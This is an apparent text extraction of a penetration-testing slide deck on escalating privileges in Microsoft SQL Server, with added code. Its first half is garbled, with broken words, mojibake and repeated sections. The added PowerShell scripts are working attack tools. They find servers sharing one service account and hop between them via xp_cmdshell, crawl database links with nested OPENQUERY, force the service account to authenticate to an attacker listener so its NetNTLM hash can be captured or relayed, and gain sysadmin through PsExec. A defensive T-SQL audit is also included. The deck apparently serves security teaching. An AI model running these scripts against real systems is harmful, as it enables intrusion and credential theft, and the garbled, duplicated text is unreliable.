PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
[Diagram: Leveraging Shared MS SQL Server Service Accounts, built up over four slides. Network zones: Internet, DMZ, Intranet. Ports 80 and 443 are open from the Internet into the DMZ; ports 1433 and 1434 from the DMZ into the Intranet. Hosts are labelled LRA, HVA, LVA, LVA and ADS, with the attacker ("Captain Evil", "PURE EVIL") on the Internet side.]
Steps annotated on the diagram:
1. SQL Injection
2. Execute local command via xp_cmdshell
3. Access to HVA with shared domain service account; execute commands and gather data from other database servers via osql
Key: HVA = High Value Application; LVA = Low Value Application
Escalating Privileges
Crawling Server Links
Escalating Privileges: Crawling Server Links
What's a database link?
Database links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
The Public role can use links to execute queries on remote servers (impersonation):
SELECT * FROM OpenQuery([SQLSERVER2], 'SELECT @@Version')
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
[Diagram: Leveraging MS SQL Database Links, built up over four slides. Same Internet / DMZ / Intranet layout as before (ports 80 and 443 into the DMZ, ports 1433 and 1434 into the Intranet; hosts LRA, HVA, LVA, ADS; attacker "Captain Evil" on the Internet side), plus a database server DB1 (LVA) reached first through a DB link with least privileges and then through a DB link with the SA account.]
Steps annotated on the diagram:
1. SQL Injection
2. Execute SQL queries and local commands on database servers via nested linked services
Key: HVA = High Value Application; LVA = Low Value Application
Escalating Privileges: Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50% of the environments we've seen.
Escalating Privileges: UNC Path Injection
UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
Almost all procedures that accept a file path in SQL Server support UNC paths.
UNC paths can be used to force the SQL Server service account to authenticate to an attacker.
An attacker can then capture the NetNTLM password hash and crack or relay it.
Relay becomes pretty easy when you know which SQL Servers are using shared accounts.
Oh yeah…
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
xp_dirtree
xp_fileexist
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
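An added T-SQL audit, not PowerUpSQL code, for the three conditions the preceding slides describe: which account runs this instance (the same answer on many servers is the shared service account case), which linked servers hand every caller a fixed remote login such as sa, and who can execute the two file-path procedures; it ends with the REVOKE that removes the default PUBLIC grant. It assumes sysadmin rights and SQL Server 2008 R2 SP1 or later (for sys.dm_server_services); the catalog name of the second procedure is xp_fileexist, which the slides write as xp_fileexists.

```sql
-- Added audit script; not part of PowerUpSQL. Run as sysadmin, in master.
-- Assumes SQL Server 2008 R2 SP1+ (sys.dm_server_services).
USE master;

-- 1. Which Windows/domain accounts run the SQL Server services on this host?
--    Collect this from every instance in the estate: one domain account
--    appearing on many hosts is the "one account to rule them all" case.
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 2. Linked servers whose default login mapping gives every caller a fixed
--    remote login. local_principal_id = 0 is the mapping that applies to all
--    logins; uses_self_credential = 0 with a remote_name means callers do not
--    pass their own identity but become that remote login (worst case: sa).
SELECT s.name                AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,   -- needed for remote stored procedure execution
       ll.remote_name,
       CASE WHEN ll.remote_name = 'sa' THEN 'HIGH' ELSE 'REVIEW' END AS risk
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
  AND ll.local_principal_id = 0
  AND ll.uses_self_credential = 0
  AND ll.remote_name IS NOT NULL;

-- 3. Who holds EXECUTE on the file-path procedures the slides name
--    (xp_fileexist is the catalog name of the slides' "xp_fileexists").
--    On a default install this returns a row for 'public' on each of them.
SELECT OBJECT_NAME(dp.major_id) AS procedure_name,
       pr.name                  AS grantee,
       dp.state_desc
FROM sys.database_permissions AS dp
JOIN sys.database_principals AS pr ON pr.principal_id = dp.grantee_principal_id
WHERE dp.class = 1                        -- object-level permission
  AND dp.permission_name = 'EXECUTE'
  AND OBJECT_NAME(dp.major_id) IN ('xp_dirtree', 'xp_fileexist');

-- 4. Mitigation: remove the default grant. Re-grant to a named role only if an
--    application genuinely needs directory listing, then re-run step 3 to confirm.
REVOKE EXECUTE ON sys.xp_dirtree   FROM public;
REVOKE EXECUTE ON sys.xp_fileexist FROM public;
```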
Escalating Privileges: UNC Path Injection DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. Sysadmins can execute OS commands (for example through xp_cmdshell).
2. Those OS commands run as the SQL Server service account.
3. The service account has sysadmin privileges on its own instance by default.
4. Companies often use a single domain account to run hundreds of SQL Servers.
5. So if you get sysadmin on one server, you effectively have it on all of them.
One account to rule them all.

[Diagram: Leveraging Shared MS SQL Server Service Accounts. Network zones: Internet, DMZ, Intranet. Labelled components: LRA, HVA, LVA, ADS (Active Directory). Ports 80 and 443 carry web traffic from the Internet into the DMZ; ports 1433 and 1434 carry SQL Server traffic from the web tier to the database servers. The attacker ("Captain Evil", labelled PURE EVIL) starts on the Internet. Key: HVA = High Value Application, LVA = Low Value Application.]

The diagram builds the attack up in three steps:
1. SQL injection against the low-value application (LVA) gives the attacker access to its SQL Server with the web application's login.
2. With sysadmin rights on that server, xp_cmdshell executes local commands; they run as the SQL Server service account, here a shared domain account.
3. Because the same domain account also runs the high-value application's (HVA) SQL Server, Windows authentication from the compromised server (osql -E, or sqlcmd -E) is enough to execute commands and gather data from the other database servers.
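The steps above as an added PowerShell example (not code from the PowerUpSQL deck or project). It maps every SQL Server in the domain to the account that runs it from MSSQLSvc service principal names, flags accounts that run more than one server, and builds the xp_cmdshell command that hops from a server you already own to its siblings. The host name lva-sql01.corp.example and the other names are hypothetical; the LDAP query needs a domain-joined host.

```powershell
# Added example, not code from the PowerUpSQL deck. Hypothetical names throughout.

function Get-SqlServiceAccountMap {
    # MSSQLSvc SPNs are registered on the account that runs the service, so one
    # LDAP query yields (account, instance) pairs for the whole domain.
    $searcher = [adsisearcher]'(servicePrincipalName=MSSQLSvc/*)'
    $searcher.PageSize = 1000
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'serviceprincipalname'))
    foreach ($r in $searcher.FindAll()) {
        $acct = [string]$r.Properties['samaccountname'][0]
        foreach ($spn in $r.Properties['serviceprincipalname']) {
            if ($spn -notlike 'MSSQLSvc/*') { continue }
            # Forms: MSSQLSvc/host.domain.tld:1433 or MSSQLSvc/host.domain.tld:INSTANCE
            [pscustomobject]@{ Account = $acct; Instance = $spn.Substring(9) }
        }
    }
}

function Get-SharedSqlServiceAccounts {
    param([Parameter(Mandatory)][object[]]$Map)
    # Instances running as LocalSystem or a virtual account register their SPNs
    # on the computer account (name ends in $). That account belongs to one host,
    # so it is never shared across servers; the interesting case is a domain user
    # account that runs instances on several hosts.
    $Map | Where-Object { $_.Account -notlike '*$' } |
        Group-Object Account | Where-Object Count -gt 1 | ForEach-Object {
            [pscustomobject]@{
                Account   = $_.Name
                Count     = $_.Count
                Instances = @($_.Group.Instance | Sort-Object -Unique)
            }
        }
}

function New-XpCmdShellHop {
    param([Parameter(Mandatory)][string]$TargetInstance,
          [string]$Query = "SELECT @@servername, SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')")
    # Runs on the server you own: xp_cmdshell starts sqlcmd (osql on old hosts)
    # as the service account, and -E presents that account's Windows identity to
    # the target. Single quotes in the command are doubled for the T-SQL literal.
    $cmd = "sqlcmd -E -S $TargetInstance -Q `"$Query`"" -replace "'", "''"
    @"
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC master..xp_cmdshell '$cmd';
"@
}

# Usage: the LDAP query is the only live step; the hop commands are printed so
# they can be run through the sysadmin session you already hold on the owned server.
$map    = Get-SqlServiceAccountMap
$shared = Get-SharedSqlServiceAccounts -Map $map
$shared | Format-Table -AutoSize

$owned = 'lva-sql01.corp.example:1433'     # hypothetical: the server reached via SQLi
$acct  = ($map | Where-Object Instance -eq $owned | Select-Object -First 1).Account
$shared | Where-Object Account -eq $acct | Select-Object -ExpandProperty Instances |
    Where-Object { $_ -ne $owned } | ForEach-Object {
        # SPN 'host:1433' -> 'host'; 'host:NAME' -> 'host\NAME' for sqlcmd -S
        New-XpCmdShellHop -TargetInstance (($_ -replace ':1433$', '') -replace ':', '\')
    }
```

Enabling xp_cmdshell requires sysadmin and is recorded in the SQL Server error log, so on a real engagement check sp_configure first and restore the original value afterwards. The same grouping is what makes the shared-account servers obvious targets for NTLM relay later in the deck: every instance listed under one account accepts that account as sysadmin.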
Escalating Privileges: Crawling Server Links
What's a database link?
• Database links (linked servers) are persistent, pre-authenticated connections from one SQL Server to another.
Why should I care?
• Short answer: privilege escalation.
• A link's login mapping commonly sends every local login to one fixed remote login, often sa or another sysadmin. Any local login covered by that mapping, even one that only holds the public role, can run queries through the link, and they execute on the remote server as that remote login (impersonation):
  SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@version')
• Stored procedures can be executed on the remote server as well, including xp_cmdshell when the remote login has the rights for it.
• Links can be crawled: each remote server may define links of its own.

[Diagram: Leveraging MS SQL Database links. Same network zones and key as above (Internet, DMZ, Intranet; HVA = High Value Application, LVA = Low Value Application). DB1 is the LVA's database server. It holds one link configured with least privileges and one link configured with the SA account.]

The diagram builds the attack up in two steps:
1. SQL injection against the LVA gives the attacker a login on DB1.
2. Through the link configured with the SA account, and through any further links defined on the servers it reaches, the attacker executes SQL queries and local commands on the nested linked servers.

Escalating Privileges: Crawling Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of the environments we've seen.
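The crawl described above as an added PowerShell example (not code from the PowerUpSQL deck or project). It nests one OPENQUERY per hop and records, for every server reached, the login you arrive as and whether it is sysadmin. The server DB1, the login webapp and the link names DB2 and DB3 are hypothetical; the live part needs a reachable SQL Server and uses System.Data.SqlClient.

```powershell
# Added example, not code from the PowerUpSQL deck. Hypothetical names throughout.

function Invoke-SqlQuery([string]$ConnectionString, [string]$Query) {
    $table = New-Object System.Data.DataTable
    $da = New-Object System.Data.SqlClient.SqlDataAdapter $Query, $ConnectionString
    [void]$da.Fill($table)      # Fill opens and closes the connection itself
    return ,$table
}

function New-NestedOpenQuery([string[]]$LinkPath, [string]$Query) {
    # Wrap from the innermost hop outward. Each level becomes a string literal
    # of the level above it, so single quotes double on every wrap: ' '' ''''
    $q = $Query
    for ($i = $LinkPath.Count - 1; $i -ge 0; $i--) {
        $q = "SELECT * FROM OPENQUERY([$($LinkPath[$i])], '$($q -replace "'", "''")')"
    }
    return $q
}

function Get-SqlLinkCrawl {
    param([string]$ConnectionString, [string[]]$LinkPath = @(),
          [System.Collections.Generic.HashSet[string]]$Seen = (New-Object 'System.Collections.Generic.HashSet[string]'))
    # OPENQUERY needs a rowset with named columns, so every column is aliased.
    $who = New-NestedOpenQuery $LinkPath "SELECT @@servername AS srv, SYSTEM_USER AS login, IS_SRVROLEMEMBER('sysadmin') AS sysadmin"
    $row = (Invoke-SqlQuery $ConnectionString $who).Rows[0]
    $srv = [string]$row.srv
    if (-not $Seen.Add($srv)) { return }    # DB1 -> DB2 -> DB1 loops are common
    [pscustomobject]@{
        Path     = $(if ($LinkPath.Count) { $LinkPath -join ' -> ' } else { '(start)' })
        Server   = $srv
        Login    = [string]$row.login
        Sysadmin = ([int]$row.sysadmin -eq 1)
    }
    # Links defined on this hop become the next hops (is_linked excludes the local entry).
    $links = New-NestedOpenQuery $LinkPath "SELECT name AS link FROM sys.servers WHERE is_linked = 1"
    foreach ($l in (Invoke-SqlQuery $ConnectionString $links).Rows) {
        Get-SqlLinkCrawl -ConnectionString $ConnectionString -LinkPath ($LinkPath + [string]$l.link) -Seen $Seen
    }
}

# Offline check of the quoting (no server needed): two hops around a query that
# already contains quotes of its own.
New-NestedOpenQuery @('DB2', 'DB3') "SELECT IS_SRVROLEMEMBER('sysadmin') AS sa"

# Live crawl, starting as the low-privileged login obtained through the web app.
$cs = 'Server=DB1;Database=master;User ID=webapp;Password=<redacted>;'
Get-SqlLinkCrawl -ConnectionString $cs | Format-Table -AutoSize
```

OPENQUERY only carries statements that return a rowset: EXEC master..xp_cmdshell 'whoami' works through it because xp_cmdshell returns rows, but sp_configure followed by RECONFIGURE does not. Enabling xp_cmdshell on a remote hop therefore normally needs EXEC ('...') AT [link], which in turn requires the RPC Out option on that link. The Seen set keys on @@servername, so a server reachable over two different paths is reported once, under the first path found.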
Escalating Privileges: UNC Path Injection
• UNC paths are used to access remote file servers, like so: \\192.168.1.4\file
• Almost all SQL Server procedures that accept a file path also accept a UNC path.
• A UNC path that points at an attacker-controlled host forces the SQL Server service account to authenticate to that host.
• The attacker can then capture the service account's NetNTLM hash (a challenge/response, so it can be cracked offline or relayed, but not passed the way an NTLM hash can) and crack or relay it.
• Relay becomes pretty easy when you know which SQL Servers run under shared accounts.
Oh yeah…
• By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path: xp_dirtree and xp_fileexist.
So in summary…
• The PUBLIC role can obtain the SQL Server service account's NetNTLM hash by default.
But who really has PUBLIC role access?
• Oh yeah, a ton of domain users.
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
• …what? It's self descriptive.
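The technique above as an added PowerShell example (not code from the PowerUpSQL deck or project). From a login that holds nothing but the public role, it checks which file-path procedures that login may execute and then makes the service account authenticate to a host you control. The server DB1, the login lowpriv and the listener address 10.0.0.5 are hypothetical; the capture or relay listener on 10.0.0.5 (Responder, Inveigh, ntlmrelayx) is outside this snippet.

```powershell
# Added example, not code from the PowerUpSQL deck. Hypothetical names throughout.

function Invoke-SqlQuery([string]$ConnectionString, [string]$Query) {
    $table = New-Object System.Data.DataTable
    $da = New-Object System.Data.SqlClient.SqlDataAdapter $Query, $ConnectionString
    [void]$da.Fill($table)      # Fill opens and closes the connection itself
    return ,$table
}

function Get-ExecutableFilePathProcs([string]$ConnectionString) {
    # HAS_PERMS_BY_NAME evaluates the caller's effective permission, so for a
    # public-only login the result is exactly what public has been granted.
    # The procedure names are constants; nothing here comes from untrusted input.
    $procs = 'xp_dirtree', 'xp_fileexist', 'xp_subdirs', 'xp_cmdshell'
    $q = ($procs | ForEach-Object {
        "SELECT '$_' AS proc_name, HAS_PERMS_BY_NAME('master.sys.$_', 'OBJECT', 'EXECUTE') AS can_exec"
    }) -join "`nUNION ALL`n"
    (Invoke-SqlQuery $ConnectionString $q).Rows |
        Select-Object proc_name, @{ n = 'CanExecute'; e = { [int]$_.can_exec -eq 1 } }
}

function Invoke-UncPathInjection([string]$ConnectionString, [string]$ListenerHost, [string]$Share = 'share') {
    # Both procedures resolve the path as the SQL Server service account, which
    # negotiates NTLM with $ListenerHost on TCP 445. xp_dirtree with depth 1 and
    # no file listing returns quickly; xp_fileexist wants a file name, so one is appended.
    $unc = "\\$ListenerHost\$Share"
    [void](Invoke-SqlQuery $ConnectionString "EXEC master.sys.xp_dirtree '$unc', 1, 0")
    [void](Invoke-SqlQuery $ConnectionString "EXEC master.sys.xp_fileexist '$unc\x.txt'")
    # Nothing useful comes back over the SQL connection; the evidence is the
    # authentication attempt that arrives at the listener.
}

$cs = 'Server=DB1;Database=master;User ID=lowpriv;Password=<redacted>;'
Get-ExecutableFilePathProcs -ConnectionString $cs | Format-Table -AutoSize
Invoke-UncPathInjection -ConnectionString $cs -ListenerHost '10.0.0.5'
```

A NULL from HAS_PERMS_BY_NAME means the securable name did not resolve, not that permission is denied. On the defensive side the same check, run as a public-only test login, confirms whether REVOKE EXECUTE ON xp_dirtree TO public (and the same for xp_fileexist) has actually been applied; the outbound SMB attempt can additionally be blocked with an egress rule for TCP 445 from the database tier.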
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways.
2. All SQL Server versions provide the service account with sysadmin privileges.

Which approach works against which version:

Approach             2000  2005  2008  2012  2014  2016
LSA Secrets           x     x     x     x     x     x
Local Administrator   x     x
LocalSystem           x     x     x
Process Migration     x     x     x     x     x     x
Token Stealing        x     x     x     x     x     x
Single User Mode            x     x     x     x     x

BUILTIN\Administrators stopped being a default member of sysadmin in SQL Server 2008, and NT AUTHORITY\SYSTEM stopped being one in SQL Server 2012. Recovering the service account's password, migrating into its process, or stealing its token works on every version because the service account itself is always sysadmin.

Below are some options for leveraging that knowledge.

Escalating Privileges: OS Admin to SysAdmin
Here are some tool options:

Approach                                                       Common Tools
Access as Local Administrator                                  Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                          PsExec, accessibility options, debugger, together with native SQL client tools
Recover SQL Server service account password from LSA Secrets   Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process    Metasploit, Empire, Python, PowerShell, C/C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process     Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                               DBATools
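The version-dependent choice above as an added PowerShell example (not code from the PowerUpSQL deck or project). Run as a local Administrator on the SQL host, it lists each instance with its service account and major version, then tries the two approaches that need nothing but native client tools: connecting as the local admin and, where the version still grants it, connecting as LocalSystem through PsExec -s. It assumes sqlcmd.exe and Sysinternals PsExec.exe are on the PATH; instance names are whatever the host reports.

```powershell
# Added example, not code from the PowerUpSQL deck. Run elevated on the SQL host.

function Get-LocalSqlInstances {
    # One Win32_Service per instance: MSSQLSERVER (default) or MSSQL$NAME.
    Get-CimInstance Win32_Service -Filter 'Name = "MSSQLSERVER" OR Name LIKE "MSSQL$%"' |
        ForEach-Object {
            $exe = $_.PathName -replace '^"([^"]+)".*$', '$1'
            [pscustomobject]@{
                Instance       = $(if ($_.Name -eq 'MSSQLSERVER') { '.' } else { '.\' + $_.Name.Split('$')[1] })
                ServiceAccount = $_.StartName   # DOMAIN\svc_sql, NT SERVICE\MSSQLSERVER, LocalSystem, ...
                State          = $_.State
                # sqlservr.exe product major: 8=2000, 9=2005, 10=2008/2008 R2, 11=2012, 12=2014, 13=2016
                Major          = (Get-Item $exe).VersionInfo.ProductMajorPart
            }
        }
}

function Test-SqlSysadmin([string]$Instance, [switch]$AsLocalSystem) {
    # Windows authentication as the current user, or as LocalSystem through PsExec -s.
    $q = "SET NOCOUNT ON; SELECT SYSTEM_USER + '|' + CAST(IS_SRVROLEMEMBER('sysadmin') AS char(1))"
    $out = if ($AsLocalSystem) {
        & PsExec.exe -accepteula -nobanner -s sqlcmd.exe -E -S $Instance -h -1 -W -Q $q 2>$null
    } else {
        & sqlcmd.exe -E -S $Instance -h -1 -W -Q $q 2>$null
    }
    $line = $out | Where-Object { $_ -match '\|' } | Select-Object -First 1
    if (-not $line) { return $null }        # connection refused or login failed
    $login, $sa = $line.Trim().Split('|')
    [pscustomobject]@{
        Instance = $Instance
        As       = $(if ($AsLocalSystem) { 'LocalSystem' } else { 'current user' })
        Login    = $login
        Sysadmin = ($sa -eq '1')
    }
}

foreach ($i in Get-LocalSqlInstances) {
    $i
    # 2000/2005: BUILTIN\Administrators is sysadmin by default, so this already works.
    Test-SqlSysadmin -Instance $i.Instance
    # 2000 through 2008 R2: NT AUTHORITY\SYSTEM is sysadmin by default; PsExec -s gets you there.
    if ($i.Major -le 10) { Test-SqlSysadmin -Instance $i.Instance -AsLocalSystem }
    # 2012 and later: neither default remains. Go through the service account itself
    # (LSA secrets, process injection, token theft) or restart the instance in single-user mode.
}
```

The ServiceAccount column tells you which of the remaining routes is worth the noise: a domain account is what LSA secrets or a stolen token gives you, and it is the same identity the shared-service-account and UNC-path sections turn into lateral movement. Note that PsExec installs and starts a temporary PSEXESVC service, which most endpoint monitoring flags.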
Common Post Exploitation Activities
Post Exploitation Overview
1. Establish persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry & file auto-runs, tasks, services, etc.
2. Identify sensitive data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate sensitive data
